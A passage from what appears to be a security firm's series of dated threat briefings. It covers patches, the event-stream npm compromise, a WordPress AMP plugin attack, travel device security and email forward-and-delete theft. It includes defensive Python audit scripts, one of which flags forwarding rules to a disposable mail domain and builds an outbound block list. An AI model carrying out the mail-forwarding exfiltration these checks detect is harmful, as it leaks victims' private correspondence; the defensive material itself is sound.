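    ranges = build_ranges(LEAKED_PASSWORDS)
    lookup = lambda prefix: ranges.get(prefix, "")
    for candidate in ["Summer2018", "Summer2019!", "P@ssword2", "correct horse battery staple"]:
        print(candidate, audit_password(candidate, LEAKED_PASSWORDS, lookup))
```

The variant check is the part a plain breach lookup misses: “Summer2019!” is not in any dump yet, but anyone holding “Summer2018” from Collection #1 will try it on the first of the month.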

Additional Resources
“The 773 Million Record “Collection #1” Data Breach” (Troy Hunt’s blog)

“Collection 1 through 5, Anti-Public, Zabagur #1” post (Raidforums)

“HaveIBeenPwned” Compromised Account Search Service

“Pwned Passwords” Compromised Password Search Service

“Credential Stuffing” (Wikipedia)

“Credential Stuffing” (OWASP)

InGuardians Events & Resources

Great news! InGuardians will be hosting monthly webinars, and you get the first invite!

This month, Larry Pesce, our Director of Research, will lead a discussion about Software Defined Radio platforms. In this webinar, you’ll examine a few interesting software packages (with demos) to begin your exploration of the RF spectrum. You’ll also discuss what the advent of SDR can do to change the landscape for C&C, data exfiltration and information gathering.

Please join us on Thursday, January 31st, at 12PM Pacific.

InGuardians friends in Florida! David Mayer, our Senior Security Consultant, will be leading a SANS Institute mentor session on the “Network Penetration Testing and Ethical Hacking” (SEC560) class:

Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019.

  • Over 30 hands-on labs
  • Comprehensive coverage of tools
  • Real-world tips from the experts
  • CTF Challenge

SEC560 is a must for every security professional! Reserve your spot now!

Dive deep into SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques with hands-on training from Justin Searle, our Director of ICS Security, at SANS Secure Japan, Mon, February 25 – Sat, March 2, 2019.

1/14/19 Microsoft patches multiple remote code execution vulnerabilities
On January 8th, 2019, Microsoft released patches for Windows that include fixes for multiple Remote Code Execution (RCE) vulnerabilities. One affects the Windows DHCP client: an attacker who can deliver a specially crafted DHCP response to a vulnerable client could execute arbitrary code in the SYSTEM context. The Jet Database Engine also has multiple RCE issues; it improperly handles memory in a way that permits execution of arbitrary code on the victim system when a crafted file is opened. There are also a couple of RCE instances in Hyper-V, which allow a malicious application running on a guest OS to execute code on the host OS. Finally, there is an RCE vulnerability in Exchange which, if triggered by a malicious email, permits arbitrary code execution in the SYSTEM context.

With multiple instances of Remote Code Execution in the first patch of 2019 but no “publicly” available proof of concepts at this time, InGuardians currently rates the impact as Medium. While exploits are not publicly available yet, it remains unknown if malicious actors have access to exploits and are actively using them.  Should such exploits become publicly available, the impact of this issue could easily move rapidly into the Critical range, particularly given the size of Microsoft Exchange’s enterprise user base.

Given the severity of these security patches, InGuardians recommends that you evaluate and push these patches to production environments posthaste.  In addition, apply any relevant IPS and IDS signatures, and monitor for triggering.

Additional Resources
“CVE-2019-0579 Details” (Mitre)

“CVE-2019-0547 Details” (Mitre)

“CVE-2019-0550 Details” (Microsoft)

“CVE-2019-0551 Details” (Microsoft)

“CVE-2019-0586 Details” (Microsoft)

InGuardians Events & Resources
Great news! InGuardians will be hosting monthly webinars, and you get the first invite!

This month, Larry Pesce, our Director of Research, will lead a discussion about Software Defined Radio platforms. In this webinar, you’ll examine a few interesting software packages (with demos) to begin your exploration of the RF spectrum. You’ll also discuss what the advent of SDR can do to change the landscape for C&C, data exfiltration and information gathering.

Please join us on Thursday, January 31st, at 12PM Pacific.

InGuardians friends in Florida! David Mayer, our Senior Security Consultant, will be leading a SANS Institute mentor session on the “Network Penetration Testing and Ethical Hacking” (SEC560) class:
Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019.
  • Over 30 hands-on labs
  • Comprehensive coverage of tools
  • Real-world tips from the experts
  • CTF Challenge

SEC560 is a must for every security professional! Reserve your spot now!

1/2/19 Failures in Delivery: CenturyLink, Tribune Publishing and the L.A. Times’ End of Year Problems
Two different events at the end of December 2018 reveal previously unrecognized gaps in business continuity planning. CenturyLink, a major telecom provider also responsible for managing critical 911 systems, experienced a nationwide outage. In addition to the heavy impact on emergency services, the disruption to their core business caused many consumers to cancel, reschedule, or conduct business and personal calls with out-of-band solutions, such as Signal and Slack.

A few days later, Tribune Publishing fell victim to a targeted malware attack that prevented or delayed the printing of several large newspapers across the United States. Tribune publishes several large newspapers, including the Baltimore Sun and the Chicago Tribune; the West Coast distribution of the Wall Street Journal and the New York Times was also affected, as all are tied to the Olympic printing plant in downtown Los Angeles.

Two different information technology issues in two different companies threatened the business continuity of many companies nationwide.

First, a single telecom provider’s disruption rippled across business and public services, preventing operations, including that of some vital 911 emergency phone services. The outage continued for more than two days and, according to a document recovered by reporter Brian Krebs, was caused by a single bad network or network management card.  FCC Chairman Ajit Pai acknowledged that the 911 service disruption will be subject to federal inquiry, saying, “I’ve directed the Public Safety and Homeland Security Bureau to immediately launch an investigation into the cause and impact of this outage.”

Second, a malware attack targeted newspapers in widely separated markets. Investigations are ongoing. The LA Times reports that the malware responsible was a variant of “Ryuk”.  This malware was highlighted specifically by the Department of Health and Human Services’ cybersecurity task force in an August advisory. However, the LA Times, also a victim, is no longer a Tribune company. It raises questions about both monoculture vulnerability and network connectivity. Challenges of merging networks from acquired companies, and among a parent firm with multiple separate entities, can leave many security gaps. Domain and Forest trusts can leave paths open for malware to spread well beyond the initial point of compromise.

Because modern business is often so heavily interconnected, the systems that businesses rely on are also increasingly interconnected. Too often these layers and branches merge together and grow out of expedience, with limited review of the security risk presented.

InGuardians recommends that organizations identify all layers in their business continuity plans. It is no longer enough to simply know who your providers are; you should also know who theirs are. Review previous Merger & Acquisition network information for single points of failure. Look for secondary or backup network connections and verify that they are, in fact, separate. Review network permissions with both parent and partner organizations. Confirm which firewalls are in place and determine if the rule sets are up to date and able to prevent the spread of malware from a “trusted” connection.

It is also important to remember that, when it comes to business continuity planning, especially for critical systems, sometimes legacy systems and processes are themselves a good fallback plan. In one case in Boston, people were unable to call 911 to report a fire. Instead of calling 911, they used a fire ‘call box’ to get firefighters on scene. Boston Fire remarked that the ‘call box’ system has been successfully operating since 1852. InGuardians reminds you to review your business continuity plans early in 2019, keeping in mind that not all business continuity failures are caused by software problems.

Additional Resources
“Communications outage disrupts 911 service in parts of the country” (CNN) 

“FCC launches probe of CenturyLink in wake of nationwide 911 outage” (NBC News) 

Brian Krebs’ disclosure of CenturyLink’s “Event Conclusion Summary” (Twitter)

“Malware attack disrupts delivery of L.A. Times and Tribune papers across the U.S.“  (LA Times) 

“Ransomware suspected in cyberattack that crippled major US newspapers“ (ZDNet) 

“Identifying, understanding, and analyzing critical infrastructure interdependencies” (IEEE Control Systems, 2002)

InGuardians Events & Resources
David Mayer, Senior Security Consultant, will be leading a SANS Institute mentor session for the “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

Enjoyed KringleCon? We did too! If you haven’t had the chance to check out InGuardians talks, you can do so here:
Mike Poor on PCAPs for fun and profit:

Larry Pesce on SDR:

Jay Beale on Kubernetes:

For more events and future training schedule, please visit

12/18/2018 Critical Windows DNS Server Heap Overflow Vulnerability
Microsoft has released patches for a remote code execution (RCE) vulnerability, a heap overflow condition described by CVE-2018-8540. Unfortunately, this critical issue has not been the subject of much discussion and has largely flown under the radar. Because DNS is critical in enterprise networks, both for the proper functioning of Active Directory environments and for access to critical internal and Internet-based resources, this issue should be addressed immediately. Additionally, the requirement for Microsoft DNS services to be implemented on a Domain Controller makes this issue even more critical to address, given the sensitive contents of Active Directory.

While no exploit code is publicly available at the time of this writing, it is strictly a matter of time before there is. Given the nature of this attack, in which only a specially crafted DNS request needs to be sent to a vulnerable server, the window before proof-of-concept code becomes available is expected to be short. Should exploit code become available in the near future, its impact could be disastrous in an unpatched environment.

If an attacker were to gain control of the Windows DNS servers serving a corporate network, the problems are several-fold. A successful attacker could:

•    modify DNS records in the domain to redirect authentication attempts to a rogue Domain Controller, in order to harvest credentials;

•    modify DNS records erroneously to perform denial of service attacks, causing complete communications failures for Active Directory or other applications;

•    use the compromised DNS server as a highly privileged pivot point, with a high likelihood of completely compromising the entire Active Directory infrastructure.

Due to the possible impact of a DNS server compromise it is critical for organizations to get ahead of public exploit code release. InGuardians recommends that organizations apply the appropriate patches as recommended by Microsoft immediately.

Additionally, with the criticality and impact of this specific exploit condition, it is a good time for organizations to review and revise their overall patching strategy and timelines.  Many organizations take a hybridized rolling approach to applying patches to critical systems in order to minimize downtime.  In these cases, critical components of the infrastructure may be left unpatched for extended periods, often 3 months or more.  Instead of relying purely on metrics, we recommend including human intelligence in this process in order to adjust patching timelines based on real-world impact.

Additional Resources
Microsoft CVE-2018-8626 Security Guidance:

December Patch Tuesday narrative:

ZDI December Patch Tuesday narrative:

InGuardians Events & Resources
InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18

For more events and future training schedule, please visit

12/12/2018 Data Security for International Travel
While traveling to the UK recently, the CEO of a small US company involved in legal action against Facebook was allegedly compelled to divulge information to the British Parliament, in violation of a US court order. [1]  The information had been obtained during the US case’s discovery phase. This started a discussion on the circumstances surrounding it. Could a Member of Parliament really order someone to turn over documents without going through the US courts? Why would the CEO take that information with him? What could he have done to protect the information?

While the truth of the story turned out to be different [2], the questions are still valid, especially when it comes to who can compel disclosure of data. Sometimes, rare and arcane options exist that even experienced legal minds don’t know about or fully understand. By the nature of their position, CEOs and other executives necessarily have access to sensitive information about strategic, operational, planning, and legal matters. This information is often carried with them on, or accessible through, their notebook computers and other electronic devices. Travel to foreign nations thus opens that information to new risks.

Even traveling to a “friendly” foreign nation means entering a new legal regime that may be entirely unfamiliar, with an entirely different set of rights and consequences. Countries that are geopolitically friendly may still have minor differences with one another, and one country might attempt to seize evidence to gain an advantage in negotiations. It’s not just formal procedures to worry about: Evil Maid attacks, in which someone gains access to a hotel room to surreptitiously access electronic devices, do occur, with varying degrees of sophistication. [3]

Modern technologies provide enormous mobility benefits. Notebooks, tablets, and phones are smaller; storage technologies like solid state drives (SSDs) are light and fast; and virtual private networks (VPNs) allow connectivity to corporate networks from around the world. But these technologies can also add risk: the devices are so integrated into our lives that we’re loath to leave them behind; SSDs work differently from traditional hard drives, making full erasure impossible to verify; and some nations have strict laws around VPNs, ranging from registered use to outright bans. The desire to keep the familiar when in an unfamiliar place can drastically increase the risk involved.

Seizure of devices can have effects ranging from loss of data availability, to data theft via forensic data recovery, to the addition of malicious code. While loss of control of sensitive data can be extremely serious, bringing back malicious code, especially code developed and installed by a nation-state, can be catastrophic not just to your company but to your partners, vendors, and customers. Foreign intelligence agencies often attempt to penetrate government systems through contractors. This kind of malware is often extremely difficult to identify and may exist for years before detection, with potentially enormous cleanup costs and possible loss of current and future business.

The number of factors going into modern travel concerns has become dizzying. Aside from the general concerns of securing data at rest and in motion, political and international factors may weigh in and change on a moment’s notice. Technical considerations for evolving computing environments also play a significant role. All of what follows is subject to company-specific risk analysis. Many variables factor into this: your company’s presence in the destination country, who the traveler is meeting, recent domestic and international incidents, and even the traveler’s social media posts and interactions. The recommendations below are therefore based on travel to high-risk countries and may not all be necessary for a trip to lower-risk nations.

When traveling to a foreign country, InGuardians recommends leaving your normal devices at home. Bring devices used only for travel, minimizing their number to ideally just a notebook and a phone. Be aware of the laws of, and relationships between, the starting, layover, and destination countries. If you’re under suspicion, the intermediate airport(s) can search you and your belongings in most cases. Bear in mind that countries can change course incredibly quickly: when crises such as terrorist attacks, international conflict, or political turmoil occur, many countries become much more aggressive in their scrutiny.

Notebooks should be configured with the absolute minimum required software, be fully patched (including firmware, drivers, and third-party programs), use whole-disk encryption, and probably have additional lock-downs that may not be used in normal deployments. Users should not be able to install software, and the notebook should not be joined to an Active Directory domain. All email and web activity should be performed through a combination of a very strong VPN with multi-factor authentication and either web or RDP access, only to the data expressly needed for the trip; no email client (including Outlook) should be installed locally, to avoid the temptation to set it up. Users should know how to verify a proper VPN connection, including validating certificates; don’t underestimate the value of paper for carrying the necessary validation information. Users should connect only to trusted networks, which in many cases will mean only their phone’s WiFi (watch out for data costs; streaming Netflix is probably a bad idea).

For the phone, get a recent model that actively receives manufacturer/carrier updates, and a new number for international travel. Give additional consideration to phone models that store password information in hardware security modules (HSMs) for resistance to password recovery attacks. Encrypt the phone and require a long password, disallowing numeric PINs. Put no personal data on it: it’s just for Internet and phone calls. Have IT create a new iTunes or Google identity for which the traveler will not have the password, to prevent installation of apps, and scrap the account after travel. Corporate email should be accessed through the phone’s browser, ideally over the same VPN the notebook uses. This means manually checking for mail rather than relying on notifications.

No device should ever leave your side: take them to meetings, meals, and wherever else you go, and do not let them out of your sight (another reason to minimize the number of devices). Consider any seized or missing device to be compromised and avoid using it at all. In a worst-case scenario, you should be ready to destroy not just a drive but an entire notebook and all other devices if there is reasonable suspicion of compromise. At a minimum, if you plan to replace rather than destroy a device, the motherboard firmware should be re-flashed and reset using an image obtained and cryptographically verified before the trip. You must also be willing to walk away from the hardware and possibly accept refusal of entry to the country (which can itself have cascading effects on future entry to that and other nations).

Additional Resources
[1] Ryan Browne, “Facebook documents seized by UK parliament ahead of a crucial hearing,” CNBC, Nov 27, 2018,
[2] “Six4Three Exec Ordered to Surrender Laptop after Facebook Leak,” Fortune, Dec 1, 2018,
[3] Christopher Boyd, “Leaving Laptops in Hotel Rooms: A Bad Idea,” Malwarebytes Labs, Oct 28, 2015, revised Mar 30, 2016,

InGuardians Events & Resources
We are happy to announce that David Mayer, Senior Security Consultant, will be leading a SANS Institute mentor session for the “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

Justin Searle, our Director of ICS Security is in DC this week, teaching his ICS410: ICS/SCADA Security Essentials at SANS Cyber Defense Initiative 

Our CTO, Jay Beale, delivered a talk & demos last week on Kubernetes Attack and Defense. You can find the slides, including Youtube links to all demonstration videos and CTF walkthrough at:

12/4/2018 Node.js package compromised, Copay targeted
NPM, the package manager for Node.js, was serving the package “event-stream” with malicious code. The malicious code was placed inside the NPM package on Oct. 5th and went unnoticed until Nov. 20th. Event-stream is a dependency of other, non-malicious packages, but this malware targeted the Copay application. The malicious code checked the balances of wallets and, if the balance criteria were met, harvested the account data and exfiltrated the data and private keys.

The impact of this attack is limited to the Copay application; however, it highlights the problems inherent in trusting dependencies, and specifically open source dependencies. The compromised package was downloaded almost 8 million times, but because the malicious code targeted a single application, its impact was limited.

InGuardians recommends that organizations identify if they are utilizing event-stream inside any Node.js applications, specifically version 3.3.6. If the affected version is found, InGuardians recommends reverting to version 3.3.4.
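A transitive dependency is as dangerous as a direct one, so the check above has to look past the top level of the dependency tree. The following script is an added example, not code from the briefing or from the npm project: it reads a package-lock.json (the nested "dependencies" layout of lockfileVersion 1, or the flat "packages" map of lockfileVersion 2 and 3) and reports every copy of event-stream at the affected version 3.3.6, together with the 3.3.4 version the briefing recommends reverting to. The embedded lockfile is constructed for the demonstration; point the script at a real file to audit an application.

```python
import json
import sys

# Versions named in the briefing: 3.3.6 carried the malicious code, 3.3.4 is the
# version it recommends reverting to.
AFFECTED_VERSIONS = {"event-stream": {"3.3.6"}}
RECOMMENDED = {"event-stream": "3.3.4"}

# Constructed sample lockfile (lockfileVersion 1 layout, nested "dependencies").
SAMPLE_LOCK = json.loads("""
{
  "name": "wallet-app",
  "lockfileVersion": 1,
  "dependencies": {
    "event-stream": {
      "version": "3.3.6",
      "dependencies": {"map-stream": {"version": "0.1.0"}}
    },
    "some-cli": {
      "version": "1.0.0",
      "dependencies": {"event-stream": {"version": "3.3.4"}}
    }
  }
}
""")


def _walk_v1(deps, path, hits):
    """Recurse through a lockfileVersion 1 'dependencies' tree, recording affected packages."""
    for name, meta in (deps or {}).items():
        here = path + [name]
        version = meta.get("version", "")
        if version in AFFECTED_VERSIONS.get(name, ()):
            hits.append(("/".join(here), name, version))
        _walk_v1(meta.get("dependencies"), here, hits)


def find_affected(lock):
    """Return [(dependency path, package name, version)] for every affected package.

    lockfileVersion 2/3 files carry a flat "packages" map keyed by node_modules path;
    lockfileVersion 1 files nest "dependencies". Nested copies are checked too.
    """
    hits = []
    packages = lock.get("packages")
    if packages:  # v2/v3: "node_modules/a/node_modules/event-stream" -> "event-stream"
        for key, meta in packages.items():
            if not key:
                continue  # "" is the root project entry, not a dependency
            name = key.rsplit("node_modules/", 1)[-1]
            version = meta.get("version", "")
            if version in AFFECTED_VERSIONS.get(name, ()):
                hits.append((key, name, version))
    else:
        _walk_v1(lock.get("dependencies"), [], hits)
    return hits


def report(hits):
    """One human-readable line per finding, naming the version to pin instead."""
    return [f"{path}@{version}: affected; pin {name}@{RECOMMENDED[name]}"
            for path, name, version in hits]


if __name__ == "__main__":
    # Usage: python lock_audit.py path/to/package-lock.json (no argument: built-in sample)
    lock = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOCK
    findings = find_affected(lock)
    print("\n".join(report(findings)) or "no affected event-stream versions found")
    sys.exit(1 if findings else 0)
```

The non-zero exit status makes the script usable as a build gate, so a rebuild cannot quietly pull the affected version back in.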

Additional Resources
Details about the event-stream incident

InGuardians Events & Resources
This Friday: Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSAs about after-hours shenanigans.

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18

For more events and future training schedule, please visit

11/27/2018 WordPress AMP Plugin Under Active New Attack, Achieving Remote Code Execution via Stored Cross-Site Scripting
Bad actors have begun to exploit a privilege escalation vulnerability in the WordPress plugin responsible for rendering Accelerated Mobile Pages (AMP) versions of a WordPress site. The vulnerability permits any registered user to plant JavaScript on any WordPress site that uses the AMP plugin. On many WordPress sites, users can register without approval for an account to make comments on posts.  One of these registered users can place JavaScript on the site using the AJAX functions in the AMP plugin. When an administrator later visits a page with that JavaScript, the attacker gains complete control of the WordPress site, including remote code execution.

There are over 100,000 active installations of the WordPress AMP plugin.  An active campaign is targeting these sites, granting remote code execution to its organizers and activating the vulnerable WooCommerce WordPress plugin, complicating matters for site owners that upgrade their AMP plugin but don’t realize that they need to upgrade or deactivate a newly-activated WooCommerce plugin. While it’s not yet known what the bad actors plan to do with all of the WordPress servers they’re compromising, it’s likely that those machines will be monetized, using some combination of ransomware, crypto-mining, and the items in Brian Krebs’ article, “The Scrap Value of a Hacked PC.”

InGuardians recommends that organizations determine whether they are hosting WordPress sites, then check those sites for the AMP plugin as well as the WooCommerce plugin. Organization staff should check that the AMP plugin is not vulnerable by confirming that its version is or later.

InGuardians also recommends that organizations configure WordPress’ automatic update feature, to ensure that plugins spend as little time vulnerable as possible.

Whenever possible, InGuardians recommends that site owners use WordPress only to author content on a private site that isn’t publicly reachable, publishing a static version of that content on their public web site.  The WordPress plugin “Simply Static” can automate this process.
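For organizations that host many WordPress sites, the first step in the recommendations above is an inventory of installed plugins. The script below is an added example, not code from the briefing or from WordPress: it reads the plugin header comment (the "Plugin Name:" and "Version:" lines WordPress itself parses from the first 8 KB of a plugin's main file) for every directory under wp-content/plugins, then reports whether the watched plugins are absent, present, below a minimum version, or acceptable. The plugin directory slugs "amp" and "woocommerce", the sample headers, and the minimum versions are assumptions for the demonstration; take the real minimums from the vendor advisories. Whether an installed plugin is active is recorded in the site database, not on disk, so treat every installed copy as worth upgrading or removing.

```python
import os
import re
import tempfile

# WordPress reads plugin metadata from a comment header in the plugin's main .php file,
# and only looks at the first 8 KB of that file.
HEADER_BYTES = 8192
HEADER_RE = re.compile(r"^[ \t/*#@]*(Plugin Name|Version):[ \t]*(.+?)[ \t]*$", re.MULTILINE)

# Directory slugs to watch; assumed names, adjust to the slugs used on your sites.
WATCHLIST = ("amp", "woocommerce")


def version_tuple(text):
    """'1.2.10' -> (1, 2, 10); non-numeric parts become 0 so comparison never raises."""
    return tuple(int(p) if p.isdigit() else 0 for p in text.split("."))


def inventory(plugins_dir):
    """Map each plugin slug under wp-content/plugins to its header name and version."""
    found = {}
    for slug in sorted(os.listdir(plugins_dir)):
        plugin_dir = os.path.join(plugins_dir, slug)
        if not os.path.isdir(plugin_dir):
            continue
        for filename in sorted(os.listdir(plugin_dir)):
            if not filename.endswith(".php"):
                continue
            path = os.path.join(plugin_dir, filename)
            with open(path, encoding="utf-8", errors="replace") as fh:
                fields = dict(HEADER_RE.findall(fh.read(HEADER_BYTES)))
            if "Plugin Name" in fields:  # the main plugin file is the one with a header
                found[slug] = {"name": fields["Plugin Name"], "version": fields.get("Version", "0")}
                break
    return found


def check(found, minimum_versions):
    """Return {slug: status} for watch-listed plugins.

    status is 'absent', 'present' (installed, no minimum known), 'outdated' or 'ok'.
    minimum_versions maps slug -> lowest acceptable version string.
    """
    status = {}
    for slug in WATCHLIST:
        if slug not in found:
            status[slug] = "absent"
        elif slug not in minimum_versions:
            status[slug] = "present"
        elif version_tuple(found[slug]["version"]) < version_tuple(minimum_versions[slug]):
            status[slug] = "outdated"
        else:
            status[slug] = "ok"
    return status


def make_sample_site():
    """Build a throwaway wp-content/plugins tree with constructed headers and versions."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    headers = {
        "amp": ("AMP for WP", "1.2.3"),           # constructed version
        "woocommerce": ("WooCommerce", "3.4.0"),  # constructed version
        "hello-dolly": ("Hello Dolly", "1.7"),
    }
    for slug, (name, version) in headers.items():
        os.makedirs(os.path.join(root, slug))
        with open(os.path.join(root, slug, slug + ".php"), "w", encoding="utf-8") as fh:
            fh.write(f"<?php\n/*\nPlugin Name: {name}\nVersion: {version}\n*/\n")
    return root


if __name__ == "__main__":
    site = make_sample_site()
    # Placeholder minimums: replace with the fixed versions from the vendor advisories.
    print(check(inventory(site), {"amp": "2.0.0", "woocommerce": "3.4.0"}))
```

Run it against the real wp-content/plugins directory of each site; where WP-CLI is available, `wp plugin list` gives the same information together with the active/inactive status.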

Finally, InGuardians recommends that organizations review the WordPress Hardening Guide, cited in the Additional Resources below.

Additional Resources
“XSS Injection Campaign Exploits WordPress AMP Plugin” (Wordfence Blog)

“Active XSS Attacks Targeting Amp for WP WordPress Plugin” (BleepingComputer)

“Simply Static [WordPress plugin]” (Code of Conduct, LLC)

“WordPress Hardening Guide”

“The Scrap Value of a Hacked PC” (Krebs on Security)

InGuardians Events & Resources
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSA about after-hours shenanigans.

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18

For more events and future training schedule, please visit

11/20/2018 Attackers use email forwarding and deletion to steal information and hide their tracks

A common, yet old, technique attackers use once they’ve gained access to a victim’s email account is to modify the user’s email forwarding settings. Messages can be forwarded to a temporary email drop-box for remote, untraceable retrieval. Users rarely check their email forwarding settings to see whether they have been edited, so the breach can remain undetected.

A clear sign of such a breach is fewer emails, or none at all, on an account where you expect traffic. That lack of email means forward-and-delete is in use.

If an attacker has access to your email account, or to the email management admin account for the whole organization, they may forward a copy of all future emails to another account and NOT delete them. In this scenario you leak all intellectual property, client information, and other sensitive data without any obvious indication to a normal user. We have seen this in the wild, targeting employee payroll and benefits sites, VPN servers, other corporate assets, and even university accounts. Attackers can target employees’ accounts on popular online retailers to monetize their access more immediately. They may also gain long-term business intelligence and intellectual property, receiving copies of all attachments as well as the emails themselves. Organizations involved in research or development are prime targets of such redirection attacks.

Check your email account configuration for odd forward or delete-upon-receipt rules. There are methods for receiving alerts when your email account configuration changes; use them. Look for forwards to odd domains, such as “nada<dot>email” (that’s a real example); there are others. These names and their associated IP addresses (IPv4 and v6) should be part of your outbound firewall filters, as there is no reason your company should be connecting to such places. A Google search for “nada email” will show you that particular service and many others. Deny organizational traffic to such places and make sure the firewall sends an alert: email from your organization trying to go there is proof of unauthorized alteration of email settings, whether by an external attacker or an insider.
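The review described above is easy to automate once the rules are exported. The following is an added example, not code from the briefing: it takes inbox-rule records (in Exchange Online the raw data would come from Get-InboxRule and the mailbox forwarding attributes; the records here are constructed in a simplified shape), flags every rule that copies mail outside the organization, rates forward-and-delete and forwards to a known disposable-mail domain as high severity, and emits the list of external domains to feed into outbound firewall deny rules with alerting. The internal domain example.com and the target domains other than the briefing's own nada.email example are constructed.

```python
# Constructed records in the shape of an exported inbox-rule listing.
SAMPLE_RULES = [
    {"mailbox": "ceo@example.com", "rule": "Archive",
     "forward_to": ["x9q2@nada.email"], "delete": True, "enabled": True},
    {"mailbox": "cfo@example.com", "rule": "Team copy",
     "forward_to": ["assistant@example.com"], "delete": False, "enabled": True},
    {"mailbox": "hr@example.com", "rule": "Backup",
     "forward_to": ["hr.backup@mailbox-example.test"], "delete": False, "enabled": True},
    {"mailbox": "dev@example.com", "rule": "Old",
     "forward_to": ["j@nada.email"], "delete": True, "enabled": False},
]

INTERNAL_DOMAINS = {"example.com"}   # constructed: your own mail domains
KNOWN_DROPBOXES = {"nada.email"}     # the briefing's own example of a throwaway mail service


def domain_of(address):
    """Lower-cased domain part of an address."""
    return address.rsplit("@", 1)[-1].lower()


def audit_rules(rules, internal_domains=INTERNAL_DOMAINS, known_dropboxes=KNOWN_DROPBOXES):
    """Flag rules that copy mail outside the organization.

    high   - forwards to a known disposable-mail domain, or forwards and deletes
             (the 'forward and delete' pattern the briefing describes)
    medium - any other forward to an external domain
    low    - external forward that is currently disabled (still worth asking who created it)
    """
    findings = []
    for r in rules:
        external = [a for a in r.get("forward_to", []) if domain_of(a) not in internal_domains]
        if not external:
            continue
        if not r.get("enabled", True):
            severity = "low"
        elif r.get("delete") or any(domain_of(a) in known_dropboxes for a in external):
            severity = "high"
        else:
            severity = "medium"
        findings.append({"mailbox": r["mailbox"], "rule": r["rule"], "external": external,
                         "deletes": bool(r.get("delete")), "severity": severity})
    return findings


def egress_blocklist(findings):
    """Domains seen as forward targets, for outbound firewall/proxy deny rules with alerting."""
    return sorted({domain_of(a) for f in findings for a in f["external"]})


if __name__ == "__main__":
    findings = audit_rules(SAMPLE_RULES)
    for f in findings:
        note = " (deletes original)" if f["deletes"] else ""
        print(f"[{f['severity']}] {f['mailbox']} rule '{f['rule']}' -> {', '.join(f['external'])}{note}")
    print("block outbound to:", egress_blocklist(findings))
```

Run it on a schedule and diff the output against the previous run: a new external forward appearing between two runs is exactly the configuration change the briefing says to alert on.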

Additional Resources
“PowerShell and Malicious O365 Email Rules“ (Crypsis Blog)

“Found a forwarding rule in CEO’s account. Need advice.” (Spiceworks User Forum)

“Don’t be a Whale – How To Detect the Business Email Compromise (BEC) Scam” (Tripwire)

“When Phishing Succeeds: The Alternate Inbox Method” (Avanan Blog)

GetNada – an example of a simple external email dropbox

InGuardians Events & Resources
Jarrod Frates, InGuardians Senior Security Analyst returns to Brakeing Down Security podcast to continue his discussion about all things pentest. If your organization is engaging in a pentest, give this a listen.
Part 1:
Part 2:

Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSA about after-hours shenanigans.

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:
ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18

For more events and future training schedule, please visit

11/14/2018 Tomorrow’s cybersecurity threat


Over the past weeks we have discussed breaking news about security flaws and exploits. Those have all come after a breach or attack was discovered. Tomorrow’s exploits will be both evolutionary and revolutionary. We will continue to see re-use of old concepts like SQL injection, bad error trapping, and flaws in embedded application code. We have seen those for years, and they remain among the top vulnerabilities in every list. Two weeks ago, researchers discovered a way to modify YouTube video links embedded in Word documents so that they run malware without triggering a User Account Control window. Just a month ago, Fancy Bear malware was found in the wild capable of “patching” and tampering with firmware in targeted attacks.

InGuardians recommends you take a step back and consider your internal training and job announcement processes. Many organizations aim to hire people who already know Application X, or announce openings for people who know “Y”. ANY particular program in use today WILL be superseded, and new devices are deployed faster than we realize they are on our networks.  Dr. Weber at the Center for Long Term Cybersecurity, UC Berkeley, uses the rapid growth of internet connected locks as an example of how our concepts and policies are not keeping up. “The notion that there’s this thing called “cybersecurity” that’s distinct from this other thing called “security” — that’s an idea that is disappearing,” Weber said.

InGuardians recommends considering security as the broader guiding concept. Too often “cyber” is separate and in an IT department. Experience reveals that company risks often start in Sales or Marketing Departments, or phishing attacks from email. It is common to be able to pivot from a user machine, discovering and then penetrating Domain Controllers.

Re-examine your network architecture to avoid the risk of an attacker simply walking from a user machine back to domain controllers and servers. Segmentation is still a useful strategy, even in an era of externally hosted web services.

Many companies like to hire experienced cyber security staff, but where do people get experience? Consider both internal training and partnering with academia for the practical skills really needed. There is now and will be for a long time a major shortage of effective security practitioners. Since that suggests difficulty in hiring them, try training your own. As Weber says, it is also important to look at people already skilled in such things as accounting or healthcare. REAL cybersecurity is a multidisciplinary and context sensitive effort.

Additional Resources
The Ten Most Critical Web Application Security Risks

Unpatched MS Word Flaw Could Allow Hackers to Infect Your Computer

